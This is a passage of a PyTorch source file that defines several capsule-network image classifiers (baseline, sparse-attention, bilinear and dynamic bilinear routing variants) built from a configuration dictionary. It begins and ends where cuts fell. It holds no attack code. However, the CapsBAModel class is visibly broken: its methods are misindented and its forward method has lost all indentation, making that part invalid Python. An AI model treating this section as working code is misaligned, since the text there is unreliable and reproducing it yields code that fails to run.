        Returns:
            Per-class logits after squeezing singleton dimensions.
        """
        #### Forward Pass
        ## Backbone (before capsule)
        c = self.pre_caps(x)
        # print(c.shape)
        # print("Backbone: ", c.shape)
        ## Primary Capsule Layer (a single CNN)
        u = self.pc_layer(c)  # torch.Size([100, 512, 14, 14])
        u = u.permute(0, 2, 3, 1)  # 100, 14, 14, 512
        # print("Shape:", u.shape)
        # Split channels into (num_caps, caps_dim) capsules.
        u = u.view(u.shape[0], self.pc_output_dim, self.pc_output_dim, self.pc_num_caps, self.pc_caps_dim)  # 100, 14, 14, 32, 16
        u = u.permute(0, 3, 1, 2, 4)  # 100, 32, 14, 14, 16
        init_capsule_value = self.nonlinear_act(u)  # capsule_utils.squash(u)

        ## Main Capsule Layers
        # concurrent routing
        if not self.sequential_routing:
            # first iteration
            # perform initialization of the capsule values as a single forward pass
            capsule_values, _val = [init_capsule_value], init_capsule_value
            for i in range(len(self.capsule_layers)):
                _val = self.capsule_layers[i].forward(_val, 0)
                capsule_values.append(_val)  # get the capsule value for next layer
            # second to t iterations
            # perform the routing between capsule layers
            for n in range(self.num_routing - 1):
                _capsule_values = [init_capsule_value]
                for i in range(len(self.capsule_layers)):
                    _val = self.capsule_layers[i].forward(capsule_values[i], n,
                                                          capsule_values[i + 1])
                    _capsule_values.append(_val)
                capsule_values = _capsule_values
        # sequential routing
        else:
            capsule_values, _val = [init_capsule_value], init_capsule_value
            for i in range(len(self.capsule_layers)):
                # first iteration
                __val = self.capsule_layers[i].forward(_val, 0)
                # second to t iterations
                # perform the routing between capsule layers
                for n in range(self.num_routing - 1):
                    __val = self.capsule_layers[i].forward(_val, n, __val)
                _val = __val
                capsule_values.append(_val)

        ## After Capsule
        out = capsule_values[-1]
        # print("out shape, ", out.shape)
        out = self.final_fc(out)  # fixed classifier for all capsules
        # print("classifier shape, ", out.shape)
        out = out.squeeze(1)  # fixed classifier for all capsules
        out = out.squeeze(2)
        out = out.squeeze(1)
        # out = torch.einsum('bnd, nd->bn', out, self.final_fc)  # different classifiers for distinct capsules
        # print("Final shape, ", out.shape)
        return out
# Capsule model
class CapsModel(nn.Module):
    """Baseline capsule network.

    Pipeline: backbone -> primary-capsule CNN -> LayerNorm -> a stack of
    CapsuleCONV / CapsuleFC layers with iterative routing -> class
    capsules -> a shared 1-unit linear classifier per class capsule.
    """

    def __init__(self,
                 image_dim_size,
                 params,
                 dataset,
                 backbone,
                 dp,
                 num_routing,
                 sequential_routing=True):
        """Build all sub-modules from the `params` configuration dict.

        Args:
            image_dim_size: unused in this constructor (API parity with
                sibling models — TODO confirm callers).
            params: config with 'backbone', 'primary_capsules', 'capsules'
                and 'class_capsules' sections (see module-level example).
            dataset: dataset name; selects the ResNet backbone variant.
            backbone: 'simple' or 'resnet'.
            dp: dropout rate forwarded to every capsule layer.
            num_routing: routing iterations per layer (>3 may converge slowly).
            sequential_routing: route layer-by-layer if True, else concurrently.
        """
        super(CapsModel, self).__init__()
        #### Parameters
        self.sequential_routing = sequential_routing

        ## Primary Capsule Layer
        self.pc_num_caps = params['primary_capsules']['num_caps']
        self.pc_caps_dim = params['primary_capsules']['caps_dim']
        self.pc_output_dim = params['primary_capsules']['out_img_size']
        ## General
        self.num_routing = num_routing  # >3 may cause slow converging

        #### Building Networks
        ## Backbone (before capsule)
        if backbone == 'simple':
            self.pre_caps = layers.simple_backbone(params['backbone']['input_dim'],
                                                   params['backbone']['output_dim'],
                                                   params['backbone']['kernel_size'],
                                                   params['backbone']['stride'],
                                                   params['backbone']['padding'])
        elif backbone == 'resnet':
            # Outputs 16 x 16 x 128 feature map.
            if dataset == 'CIFAR10' or dataset == 'CIFAR100' or "NIST" in dataset:
                print("Using standard ResNet Backbone")
                self.pre_caps = layers.resnet_backbone_cifar(params['backbone']['input_dim'],
                                                             params['backbone']['output_dim'],
                                                             params['backbone']['stride'])
            else:
                print("Using New ResNet Backbone")
                self.pre_caps = layers.resnet_backbone_imagenet(params['backbone']['input_dim'],
                                                                params['backbone']['output_dim'],
                                                                params['backbone']['stride'])

        ## Primary Capsule Layer (a single CNN)
        # {'kernel_size': 1, 'stride': 1, 'input_dim': 128, 'caps_dim': 16, 'num_caps': 32, 'padding': 0, 'out_img_size': 16}
        print(params['primary_capsules'])
        self.pc_layer = nn.Conv2d(in_channels=params['primary_capsules']['input_dim'],
                                  out_channels=params['primary_capsules']['num_caps'] *
                                  params['primary_capsules']['caps_dim'],
                                  kernel_size=params['primary_capsules']['kernel_size'],
                                  stride=params['primary_capsules']['stride'],
                                  padding=params['primary_capsules']['padding'],
                                  bias=False)
        # self.pc_layer = nn.Sequential()
        self.nonlinear_act = nn.LayerNorm(params['primary_capsules']['caps_dim'])

        ## Main Capsule Layers
        self.capsule_layers = nn.ModuleList([])
        for i in range(len(params['capsules'])):
            if params['capsules'][i]['type'] == 'CONV':
                in_n_caps = params['primary_capsules']['num_caps'] if i == 0 else \
                    params['capsules'][i - 1]['num_caps']
                in_d_caps = params['primary_capsules']['caps_dim'] if i == 0 else \
                    params['capsules'][i - 1]['caps_dim']
                # num_in_capsules=32, in_cap_d=16, out_Cap=32, out_dim_cap=16
                # 3x3 kernel, stride 2 and output shape: 7x7
                self.capsule_layers.append(
                    layers.CapsuleCONV(in_n_capsules=in_n_caps,
                                       in_d_capsules=in_d_caps,
                                       out_n_capsules=params['capsules'][i]['num_caps'],
                                       out_d_capsules=params['capsules'][i]['caps_dim'],
                                       kernel_size=params['capsules'][i]['kernel_size'],
                                       stride=params['capsules'][i]['stride'],
                                       matrix_pose=params['capsules'][i]['matrix_pose'],
                                       dp=dp,
                                       coordinate_add=False
                                       )
                )
            elif params['capsules'][i]['type'] == 'FC':
                if i == 0:
                    # When there is no Conv layer after primary capsules
                    in_n_caps = params['primary_capsules']['num_caps'] * params['primary_capsules']['out_img_size'] * \
                        params['primary_capsules']['out_img_size']
                    in_d_caps = params['primary_capsules']['caps_dim']
                elif params['capsules'][i - 1]['type'] == 'FC':
                    in_n_caps = params['capsules'][i - 1]['num_caps']
                    in_d_caps = params['capsules'][i - 1]['caps_dim']
                elif params['capsules'][i - 1]['type'] == 'CONV':
                    # There are a total of 14X14X32 capsule outputs, each being 16 dimensional
                    in_n_caps = params['capsules'][i - 1]['num_caps'] * params['capsules'][i - 1]['out_img_size'] * \
                        params['capsules'][i - 1]['out_img_size']
                    in_d_caps = params['capsules'][i - 1]['caps_dim']
                self.capsule_layers.append(
                    layers.CapsuleFC(in_n_capsules=in_n_caps,
                                     in_d_capsules=in_d_caps,
                                     out_n_capsules=params['capsules'][i]['num_caps'],
                                     out_d_capsules=params['capsules'][i]['caps_dim'],
                                     matrix_pose=params['capsules'][i]['matrix_pose'],
                                     dp=dp
                                     )
                )

        ## Class Capsule Layer
        # Input size depends on the last intermediate layer; falls back to
        # the primary capsules when 'capsules' is empty.
        if not len(params['capsules']) == 0:
            if params['capsules'][-1]['type'] == 'FC':
                in_n_caps = params['capsules'][-1]['num_caps']
                in_d_caps = params['capsules'][-1]['caps_dim']
            elif params['capsules'][-1]['type'] == 'CONV':
                in_n_caps = params['capsules'][-1]['num_caps'] * params['capsules'][-1]['out_img_size'] * \
                    params['capsules'][-1]['out_img_size']
                in_d_caps = params['capsules'][-1]['caps_dim']
        else:
            in_n_caps = params['primary_capsules']['num_caps'] * params['primary_capsules']['out_img_size'] * \
                params['primary_capsules']['out_img_size']
            in_d_caps = params['primary_capsules']['caps_dim']
        self.capsule_layers.append(
            layers.CapsuleFC(in_n_capsules=in_n_caps,
                             in_d_capsules=in_d_caps,
                             out_n_capsules=params['class_capsules']['num_caps'],
                             out_d_capsules=params['class_capsules']['caps_dim'],
                             matrix_pose=params['class_capsules']['matrix_pose'],
                             dp=dp
                             )
        )

        ## After Capsule
        # fixed classifier for all class capsules
        self.final_fc = nn.Linear(params['class_capsules']['caps_dim'], 1)
        # different classifier for different capsules
        # self.final_fc = nn.Parameter(torch.randn(params['class_capsules']['num_caps'], params['class_capsules']['caps_dim']))

    def forward(self, x, lbl_1=None, lbl_2=None):
        """Run backbone, primary capsules and routed capsule layers.

        Args:
            x: input image batch.
            lbl_1, lbl_2: unused here; presumably kept for trainer API
                compatibility — confirm against callers.

        Returns:
            Per-class logits after squeezing singleton dimensions.
        """
        #### Forward Pass
        ## Backbone (before capsule)
        # Converts Input (b, 3, 14, 14)--> (b, 128, 14, 14)
        c = self.pre_caps(x)
        ## Primary Capsule Layer (a single CNN) (Output size: b, 512, 14, 14) (32 caps, 16 dim each)
        u = self.pc_layer(c)
        u = u.permute(0, 2, 3, 1)  # b, 14, 14, 512
        u = u.view(u.shape[0], self.pc_output_dim, self.pc_output_dim, self.pc_num_caps, self.pc_caps_dim)  # b, 14, 14, 32, 16
        u = u.permute(0, 3, 1, 2, 4)  # b, 32, 14, 14, 16
        # Layer norm
        init_capsule_value = self.nonlinear_act(u)  # capsule_utils.squash(u)

        ## Main Capsule Layers
        # concurrent routing
        if not self.sequential_routing:
            # first iteration
            # perform initialization of the capsule values as a single forward pass
            capsule_values, _val = [init_capsule_value], init_capsule_value
            for i in range(len(self.capsule_layers)):
                _val = self.capsule_layers[i].forward(_val, 0)
                capsule_values.append(_val)  # get the capsule value for next layer
            # second to t iterations
            # perform the routing between capsule layers
            for n in range(self.num_routing - 1):
                _capsule_values = [init_capsule_value]
                for i in range(len(self.capsule_layers)):
                    _val = self.capsule_layers[i].forward(capsule_values[i], n,
                                                          capsule_values[i + 1])
                    _capsule_values.append(_val)
                capsule_values = _capsule_values
        # sequential routing
        else:
            capsule_values, _val = [init_capsule_value], init_capsule_value
            for i in range(len(self.capsule_layers)):
                # first iteration
                __val = self.capsule_layers[i].forward(_val, 0)
                # second to t iterations
                # perform the routing between the 2 capsule layers for some iterations
                # till you move to next pair of layers
                for n in range(self.num_routing - 1):
                    __val = self.capsule_layers[i].forward(_val, n, __val)
                _val = __val
                capsule_values.append(_val)

        ## After Capsule
        # Output capsule (last layer)
        out = capsule_values[-1]
        out = self.final_fc(out)  # fixed classifier for all capsules
        out = out.squeeze()  # fixed classifier for all capsules
        # out = torch.einsum('bnd, nd->bn', out, self.final_fc)  # different classifiers for distinct capsules
        return out
# Capsule model with bilinear sparse routing
class CapsSAModel(nn.Module):
    """Capsule network using sparse-attention (SA*) capsule layers.

    Same pipeline as CapsModel, but the capsule layers are
    layers.SACapsuleCONV / layers.SACapsuleFC.
    """

    def __init__(self,
                 image_dim_size,
                 params,
                 dataset,
                 backbone,
                 dp,
                 num_routing,
                 sequential_routing=True):
        """Build all sub-modules from the `params` configuration dict.

        Args:
            image_dim_size: unused in this constructor (API parity with
                sibling models — TODO confirm callers).
            params: config with 'backbone', 'primary_capsules', 'capsules'
                and 'class_capsules' sections (see module-level example).
            dataset: dataset name; selects the ResNet backbone variant.
            backbone: 'simple' or 'resnet'.
            dp: dropout rate forwarded to every capsule layer.
            num_routing: routing iterations per layer (>3 may converge slowly).
            sequential_routing: route layer-by-layer if True, else concurrently.
        """
        super(CapsSAModel, self).__init__()
        #### Parameters
        self.sequential_routing = sequential_routing

        ## Primary Capsule Layer
        self.pc_num_caps = params['primary_capsules']['num_caps']
        self.pc_caps_dim = params['primary_capsules']['caps_dim']
        self.pc_output_dim = params['primary_capsules']['out_img_size']
        ## General
        self.num_routing = num_routing  # >3 may cause slow converging

        #### Building Networks
        ## Backbone (before capsule)
        if backbone == 'simple':
            self.pre_caps = layers.simple_backbone(params['backbone']['input_dim'],
                                                   params['backbone']['output_dim'],
                                                   params['backbone']['kernel_size'],
                                                   params['backbone']['stride'],
                                                   params['backbone']['padding'])
        elif backbone == 'resnet':
            # Outputs 16 x 16 x 128 feature map.
            if dataset == 'CIFAR10' or dataset == 'CIFAR100' or "NIST" in dataset:
                print("Using CIFAR backbone")
                self.pre_caps = layers.resnet_backbone_cifar(params['backbone']['input_dim'],
                                                             params['backbone']['output_dim'],
                                                             params['backbone']['stride'])
            else:
                print("Using New ResNet Backbone")
                self.pre_caps = layers.resnet_backbone_imagenet(params['backbone']['input_dim'],
                                                                params['backbone']['output_dim'],
                                                                params['backbone']['stride'])

        ## Primary Capsule Layer (a single CNN)
        self.pc_layer = nn.Conv2d(in_channels=params['primary_capsules']['input_dim'],
                                  out_channels=params['primary_capsules']['num_caps'] *
                                  params['primary_capsules']['caps_dim'],
                                  kernel_size=params['primary_capsules']['kernel_size'],
                                  stride=params['primary_capsules']['stride'],
                                  padding=params['primary_capsules']['padding'],
                                  bias=False)
        # self.pc_layer = nn.Sequential()
        self.nonlinear_act = nn.LayerNorm(params['primary_capsules']['caps_dim'])

        ## Main Capsule Layers
        self.capsule_layers = nn.ModuleList([])
        for i in range(len(params['capsules'])):
            if params['capsules'][i]['type'] == 'CONV':
                in_n_caps = params['primary_capsules']['num_caps'] if i == 0 else \
                    params['capsules'][i - 1]['num_caps']
                in_d_caps = params['primary_capsules']['caps_dim'] if i == 0 else \
                    params['capsules'][i - 1]['caps_dim']
                self.capsule_layers.append(
                    layers.SACapsuleCONV(in_n_capsules=in_n_caps,
                                         in_d_capsules=in_d_caps,
                                         out_n_capsules=params['capsules'][i]['num_caps'],
                                         out_d_capsules=params['capsules'][i]['caps_dim'],
                                         kernel_size=params['capsules'][i]['kernel_size'],
                                         stride=params['capsules'][i]['stride'],
                                         matrix_pose=params['capsules'][i]['matrix_pose'],
                                         dp=dp,
                                         coordinate_add=False,
                                         padding=params['capsules'][i].get('padding', None)
                                         )
                )
            elif params['capsules'][i]['type'] == 'FC':
                if i == 0:
                    in_n_caps = params['primary_capsules']['num_caps'] * params['primary_capsules']['out_img_size'] * \
                        params['primary_capsules']['out_img_size']
                    in_d_caps = params['primary_capsules']['caps_dim']
                elif params['capsules'][i - 1]['type'] == 'FC':
                    in_n_caps = params['capsules'][i - 1]['num_caps']
                    in_d_caps = params['capsules'][i - 1]['caps_dim']
                elif params['capsules'][i - 1]['type'] == 'CONV':
                    in_n_caps = params['capsules'][i - 1]['num_caps'] * params['capsules'][i - 1]['out_img_size'] * \
                        params['capsules'][i - 1]['out_img_size']
                    in_d_caps = params['capsules'][i - 1]['caps_dim']
                self.capsule_layers.append(
                    layers.SACapsuleFC(in_n_capsules=in_n_caps,
                                       in_d_capsules=in_d_caps,
                                       out_n_capsules=params['capsules'][i]['num_caps'],
                                       out_d_capsules=params['capsules'][i]['caps_dim'],
                                       matrix_pose=params['capsules'][i]['matrix_pose'],
                                       dp=dp
                                       )
                )

        ## Class Capsule Layer
        # Input size depends on the last intermediate layer; falls back to
        # the primary capsules when 'capsules' is empty.
        if not len(params['capsules']) == 0:
            if params['capsules'][-1]['type'] == 'FC':
                in_n_caps = params['capsules'][-1]['num_caps']
                in_d_caps = params['capsules'][-1]['caps_dim']
            elif params['capsules'][-1]['type'] == 'CONV':
                in_n_caps = params['capsules'][-1]['num_caps'] * params['capsules'][-1]['out_img_size'] * \
                    params['capsules'][-1]['out_img_size']
                in_d_caps = params['capsules'][-1]['caps_dim']
        else:
            in_n_caps = params['primary_capsules']['num_caps'] * params['primary_capsules']['out_img_size'] * \
                params['primary_capsules']['out_img_size']
            in_d_caps = params['primary_capsules']['caps_dim']
        self.capsule_layers.append(
            layers.SACapsuleFC(in_n_capsules=in_n_caps,
                               in_d_capsules=in_d_caps,
                               out_n_capsules=params['class_capsules']['num_caps'],
                               out_d_capsules=params['class_capsules']['caps_dim'],
                               matrix_pose=params['class_capsules']['matrix_pose'],
                               dp=dp
                               )
        )

        ## After Capsule
        # fixed classifier for all class capsules
        self.final_fc = nn.Linear(params['class_capsules']['caps_dim'], 1)
        # different classifier for different capsules
        # self.final_fc = nn.Parameter(torch.randn(params['class_capsules']['num_caps'], params['class_capsules']['caps_dim']))

    def forward(self, x, lbl_1=None, lbl_2=None):
        """Run backbone, primary capsules and routed capsule layers.

        Args:
            x: input image batch.
            lbl_1, lbl_2: unused here; presumably kept for trainer API
                compatibility — confirm against callers.

        Returns:
            Per-class logits after squeezing singleton dimensions.
        """
        #### Forward Pass
        ## Backbone (before capsule)
        c = self.pre_caps(x)
        # print(c.shape)
        # print("Backbone: ", c.shape)
        ## Primary Capsule Layer (a single CNN)
        u = self.pc_layer(c)  # torch.Size([100, 512, 14, 14])
        u = u.permute(0, 2, 3, 1)  # 100, 14, 14, 512
        # print("Shape:", u.shape)
        u = u.view(u.shape[0], self.pc_output_dim, self.pc_output_dim, self.pc_num_caps, self.pc_caps_dim)  # 100, 14, 14, 32, 16
        u = u.permute(0, 3, 1, 2, 4)  # 100, 32, 14, 14, 16
        init_capsule_value = self.nonlinear_act(u)  # capsule_utils.squash(u)

        ## Main Capsule Layers
        # concurrent routing
        if not self.sequential_routing:
            # first iteration
            # perform initialization of the capsule values as a single forward pass
            capsule_values, _val = [init_capsule_value], init_capsule_value
            for i in range(len(self.capsule_layers)):
                _val = self.capsule_layers[i].forward(_val, 0)
                capsule_values.append(_val)  # get the capsule value for next layer
            # second to t iterations
            # perform the routing between capsule layers
            for n in range(self.num_routing - 1):
                _capsule_values = [init_capsule_value]
                for i in range(len(self.capsule_layers)):
                    _val = self.capsule_layers[i].forward(capsule_values[i], n,
                                                          capsule_values[i + 1])
                    _capsule_values.append(_val)
                capsule_values = _capsule_values
        # sequential routing
        else:
            capsule_values, _val = [init_capsule_value], init_capsule_value
            for i in range(len(self.capsule_layers)):
                # first iteration
                __val = self.capsule_layers[i].forward(_val, 0)
                # second to t iterations
                # perform the routing between capsule layers
                for n in range(self.num_routing - 1):
                    __val = self.capsule_layers[i].forward(_val, n, __val)
                _val = __val
                capsule_values.append(_val)

        ## After Capsule
        out = capsule_values[-1]
        # print("out shape, ", out.shape)
        out = self.final_fc(out)  # fixed classifier for all capsules
        # print("classifier shape, ", out.shape)
        out = out.squeeze(1)  # fixed classifier for all capsules
        out = out.squeeze(2)
        out = out.squeeze(1)
        # out = torch.einsum('bnd, nd->bn', out, self.final_fc)  # different classifiers for distinct capsules
        # print("Final shape, ", out.shape)
        return out
# Capsule model with bilinear routing without sinkhorn
class CapsBAModel(nn.Module):
def __init__(self,
             image_dim_size,
             params,
             dataset,
             backbone,
             dp,
             num_routing,
             sequential_routing=True):
    """Build all sub-modules from the `params` configuration dict.

    Same construction as CapsSAModel.__init__, but with the
    bilinear-attention (BA*) capsule layers from `layers`.

    Args:
        image_dim_size: unused in this constructor (API parity with
            sibling models — TODO confirm callers).
        params: config with 'backbone', 'primary_capsules', 'capsules'
            and 'class_capsules' sections (see module-level example).
        dataset: dataset name; selects the ResNet backbone variant.
        backbone: 'simple' or 'resnet'.
        dp: dropout rate forwarded to every capsule layer.
        num_routing: routing iterations per layer (>3 may converge slowly).
        sequential_routing: route layer-by-layer if True, else concurrently.
    """
    super(CapsBAModel, self).__init__()
    #### Parameters
    self.sequential_routing = sequential_routing

    ## Primary Capsule Layer
    self.pc_num_caps = params['primary_capsules']['num_caps']
    self.pc_caps_dim = params['primary_capsules']['caps_dim']
    self.pc_output_dim = params['primary_capsules']['out_img_size']
    ## General
    self.num_routing = num_routing  # >3 may cause slow converging

    #### Building Networks
    ## Backbone (before capsule)
    if backbone == 'simple':
        self.pre_caps = layers.simple_backbone(params['backbone']['input_dim'],
                                               params['backbone']['output_dim'],
                                               params['backbone']['kernel_size'],
                                               params['backbone']['stride'],
                                               params['backbone']['padding'])
    elif backbone == 'resnet':
        # Outputs 16 x 16 x 128 feature map.
        if dataset == 'CIFAR10' or dataset == 'CIFAR100' or "NIST" in dataset:
            print("Using CIFAR backbone")
            self.pre_caps = layers.resnet_backbone_cifar(params['backbone']['input_dim'],
                                                         params['backbone']['output_dim'],
                                                         params['backbone']['stride'])
        else:
            print("Using New ResNet Backbone")
            self.pre_caps = layers.resnet_backbone_imagenet(params['backbone']['input_dim'],
                                                            params['backbone']['output_dim'],
                                                            params['backbone']['stride'])

    ## Primary Capsule Layer (a single CNN)
    self.pc_layer = nn.Conv2d(in_channels=params['primary_capsules']['input_dim'],
                              out_channels=params['primary_capsules']['num_caps'] *
                              params['primary_capsules']['caps_dim'],
                              kernel_size=params['primary_capsules']['kernel_size'],
                              stride=params['primary_capsules']['stride'],
                              padding=params['primary_capsules']['padding'],
                              bias=False)
    # self.pc_layer = nn.Sequential()
    self.nonlinear_act = nn.LayerNorm(params['primary_capsules']['caps_dim'])

    ## Main Capsule Layers
    self.capsule_layers = nn.ModuleList([])
    for i in range(len(params['capsules'])):
        if params['capsules'][i]['type'] == 'CONV':
            in_n_caps = params['primary_capsules']['num_caps'] if i == 0 else \
                params['capsules'][i - 1]['num_caps']
            in_d_caps = params['primary_capsules']['caps_dim'] if i == 0 else \
                params['capsules'][i - 1]['caps_dim']
            self.capsule_layers.append(
                layers.BACapsuleCONV(in_n_capsules=in_n_caps,
                                     in_d_capsules=in_d_caps,
                                     out_n_capsules=params['capsules'][i]['num_caps'],
                                     out_d_capsules=params['capsules'][i]['caps_dim'],
                                     kernel_size=params['capsules'][i]['kernel_size'],
                                     stride=params['capsules'][i]['stride'],
                                     matrix_pose=params['capsules'][i]['matrix_pose'],
                                     dp=dp,
                                     coordinate_add=False,
                                     padding=params['capsules'][i].get('padding', None)
                                     )
            )
        elif params['capsules'][i]['type'] == 'FC':
            if i == 0:
                in_n_caps = params['primary_capsules']['num_caps'] * params['primary_capsules']['out_img_size'] * \
                    params['primary_capsules']['out_img_size']
                in_d_caps = params['primary_capsules']['caps_dim']
            elif params['capsules'][i - 1]['type'] == 'FC':
                in_n_caps = params['capsules'][i - 1]['num_caps']
                in_d_caps = params['capsules'][i - 1]['caps_dim']
            elif params['capsules'][i - 1]['type'] == 'CONV':
                in_n_caps = params['capsules'][i - 1]['num_caps'] * params['capsules'][i - 1]['out_img_size'] * \
                    params['capsules'][i - 1]['out_img_size']
                in_d_caps = params['capsules'][i - 1]['caps_dim']
            self.capsule_layers.append(
                layers.BACapsuleFC(in_n_capsules=in_n_caps,
                                   in_d_capsules=in_d_caps,
                                   out_n_capsules=params['capsules'][i]['num_caps'],
                                   out_d_capsules=params['capsules'][i]['caps_dim'],
                                   matrix_pose=params['capsules'][i]['matrix_pose'],
                                   dp=dp
                                   )
            )

    ## Class Capsule Layer
    # Input size depends on the last intermediate layer; falls back to
    # the primary capsules when 'capsules' is empty.
    if not len(params['capsules']) == 0:
        if params['capsules'][-1]['type'] == 'FC':
            in_n_caps = params['capsules'][-1]['num_caps']
            in_d_caps = params['capsules'][-1]['caps_dim']
        elif params['capsules'][-1]['type'] == 'CONV':
            in_n_caps = params['capsules'][-1]['num_caps'] * params['capsules'][-1]['out_img_size'] * \
                params['capsules'][-1]['out_img_size']
            in_d_caps = params['capsules'][-1]['caps_dim']
    else:
        in_n_caps = params['primary_capsules']['num_caps'] * params['primary_capsules']['out_img_size'] * \
            params['primary_capsules']['out_img_size']
        in_d_caps = params['primary_capsules']['caps_dim']
    self.capsule_layers.append(
        layers.BACapsuleFC(in_n_capsules=in_n_caps,
                           in_d_capsules=in_d_caps,
                           out_n_capsules=params['class_capsules']['num_caps'],
                           out_d_capsules=params['class_capsules']['caps_dim'],
                           matrix_pose=params['class_capsules']['matrix_pose'],
                           dp=dp
                           )
    )

    ## After Capsule
    # fixed classifier for all class capsules
    self.final_fc = nn.Linear(params['class_capsules']['caps_dim'], 1)
    # different classifier for different capsules
    # self.final_fc = nn.Parameter(torch.randn(params['class_capsules']['num_caps'], params['class_capsules']['caps_dim']))
def forward(self, x, lbl_1=None, lbl_2=None):
#### Forward Pass
## Backbone (before capsule)
c = self.pre_caps(x)
# print(c.shape)
# print("Backbone: ", c.shape)
## Primary Capsule Layer (a single CNN)
u = self.pc_layer(c) # torch.Size([100, 512, 14, 14])
u = u.permute(0, 2, 3, 1) # 100, 14, 14, 512
# print("Shape:", u.shape)
u = u.view(u.shape[0], self.pc_output_dim, self.pc_output_dim, self.pc_num_caps, self.pc_caps_dim) # 100, 14, 14, 32, 16
u = u.permute(0, 3, 1, 2, 4) # 100, 32, 14, 14, 16
init_capsule_value = self.nonlinear_act(u)#capsule_utils.squash(u)
## Main Capsule Layers
# concurrent routing
if not self.sequential_routing:
# first iteration
# perform initilialization for the capsule values as single forward passing
capsule_values, _val = [init_capsule_value], init_capsule_value
for i in range(len(self.capsule_layers)):
_val = self.capsule_layers[i].forward(_val, 0)
capsule_values.append(_val) # get the capsule value for next layer
# second to t iterations
# perform the routing between capsule layers
for n in range(self.num_routing-1):
_capsule_values = [init_capsule_value]
for i in range(len(self.capsule_layers)):
_val = self.capsule_layers[i].forward(capsule_values[i], n,
capsule_values[i+1])
_capsule_values.append(_val)
capsule_values = _capsule_values
# sequential routing
else:
capsule_values, _val = [init_capsule_value], init_capsule_value
for i in range(len(self.capsule_layers)):
# first iteration
__val = self.capsule_layers[i].forward(_val, 0)
# second to t iterations
# perform the routing between capsule layers
for n in range(self.num_routing-1):
__val = self.capsule_layers[i].forward(_val, n, __val)
_val = __val
capsule_values.append(_val)
## After Capsule
out = capsule_values[-1]
# print("out shape, ", out.shape)
out = self.final_fc(out) # fixed classifier for all capsules
# print("classifier shape, ", out.shape)
out = out.squeeze(1) # fixed classifier for all capsules
out = out.squeeze(2)
out = out.squeeze(1)
#out = torch.einsum('bnd, nd->bn', out, self.final_fc) # different classifiers for distinct capsules
# print("Final shape, ", out.shape)
return out
# Capsule model with bilinear routing with dynamic routing
class CapsDBAModel(nn.Module):
    """Capsule network routed with dynamic bilinear attention (DBA).

    Pipeline: backbone CNN -> primary-capsule conv -> stacked DBA CONV/FC
    capsule layers -> class-capsule FC layer -> a shared ``nn.Linear`` that
    maps each class capsule to a single logit.

    Args:
        image_dim_size: input image side length (kept for interface parity
            with sibling models; not used directly here).
        params: nested config dict with 'backbone', 'primary_capsules',
            'capsules' (possibly empty list) and 'class_capsules' sections.
        dataset: dataset name; CIFAR10/CIFAR100/"NIST"-containing names pick
            the CIFAR resnet backbone, anything else the imagenet variant.
        backbone: 'simple' or 'resnet'.
        dp: dropout rate forwarded to every capsule layer.
        num_routing: routing iterations per layer (>3 may converge slowly).
        sequential_routing: forward() only implements sequential routing for
            this model; with False no capsule layer runs (see forward()).
    """

    @staticmethod
    def _fc_input_shape(cfg, spatial):
        """Return (n_caps, caps_dim) that an FC capsule layer sees when it
        reads from the layer described by ``cfg``.

        ``spatial`` is True for convolutional capsule outputs (primary or
        CONV layers), whose out_img_size x out_img_size grid positions are
        flattened into the capsule axis.
        """
        n_caps = cfg['num_caps']
        if spatial:
            n_caps = n_caps * cfg['out_img_size'] * cfg['out_img_size']
        return n_caps, cfg['caps_dim']

    def __init__(self,
                 image_dim_size,
                 params,
                 dataset,
                 backbone,
                 dp,
                 num_routing,
                 sequential_routing=True):
        super(CapsDBAModel, self).__init__()
        #### Parameters
        self.sequential_routing = sequential_routing
        ## Primary Capsule Layer
        self.pc_num_caps = params['primary_capsules']['num_caps']
        self.pc_caps_dim = params['primary_capsules']['caps_dim']
        self.pc_output_dim = params['primary_capsules']['out_img_size']
        ## General
        self.num_routing = num_routing  # >3 may cause slow converging

        #### Building Networks
        ## Backbone (before capsule)
        if backbone == 'simple':
            self.pre_caps = layers.simple_backbone(params['backbone']['input_dim'],
                                                   params['backbone']['output_dim'],
                                                   params['backbone']['kernel_size'],
                                                   params['backbone']['stride'],
                                                   params['backbone']['padding'])
        elif backbone == 'resnet':
            # Outputs 16 x 16 x 128 dim
            if dataset == 'CIFAR10' or dataset == 'CIFAR100' or "NIST" in dataset:
                print("Using CIFAR backbone")
                self.pre_caps = layers.resnet_backbone_cifar(params['backbone']['input_dim'],
                                                             params['backbone']['output_dim'],
                                                             params['backbone']['stride'])
            else:
                print("Using New ResNet Backbone")
                self.pre_caps = layers.resnet_backbone_imagenet(params['backbone']['input_dim'],
                                                                params['backbone']['output_dim'],
                                                                params['backbone']['stride'])

        ## Primary Capsule Layer (a single CNN)
        self.pc_layer = nn.Conv2d(in_channels=params['primary_capsules']['input_dim'],
                                  out_channels=params['primary_capsules']['num_caps'] *
                                  params['primary_capsules']['caps_dim'],
                                  kernel_size=params['primary_capsules']['kernel_size'],
                                  stride=params['primary_capsules']['stride'],
                                  padding=params['primary_capsules']['padding'],
                                  bias=False)
        #self.pc_layer = nn.Sequential()
        # LayerNorm over the capsule dim; NOTE(review): forward() feeds the raw
        # poses to routing and never applies this module.
        self.nonlinear_act = nn.LayerNorm(params['primary_capsules']['caps_dim'])

        ## Main Capsule Layers
        self.capsule_layers = nn.ModuleList([])
        for i in range(len(params['capsules'])):
            cap = params['capsules'][i]
            if cap['type'] == 'CONV':
                # CONV layers keep the spatial grid, so the input capsule count
                # is the per-position count of the previous (or primary) layer.
                prev = params['primary_capsules'] if i == 0 else params['capsules'][i - 1]
                self.capsule_layers.append(
                    layers.DBACapsuleCONV(in_n_capsules=prev['num_caps'],
                                          in_d_capsules=prev['caps_dim'],
                                          out_n_capsules=cap['num_caps'],
                                          out_d_capsules=cap['caps_dim'],
                                          kernel_size=cap['kernel_size'],
                                          stride=cap['stride'],
                                          matrix_pose=cap['matrix_pose'],
                                          dp=dp,
                                          coordinate_add=False,
                                          padding=cap.get('padding', None)
                                          )
                )
            elif cap['type'] == 'FC':
                # FC layers flatten any spatial grid from the previous layer.
                if i == 0:
                    in_n_caps, in_d_caps = self._fc_input_shape(params['primary_capsules'], True)
                else:
                    prev = params['capsules'][i - 1]
                    in_n_caps, in_d_caps = self._fc_input_shape(prev, prev['type'] == 'CONV')
                self.capsule_layers.append(
                    layers.DBACapsuleFC(in_n_capsules=in_n_caps,
                                        in_d_capsules=in_d_caps,
                                        out_n_capsules=cap['num_caps'],
                                        out_d_capsules=cap['caps_dim'],
                                        matrix_pose=cap['matrix_pose'],
                                        dp=dp
                                        )
                )

        ## Class Capsule Layer
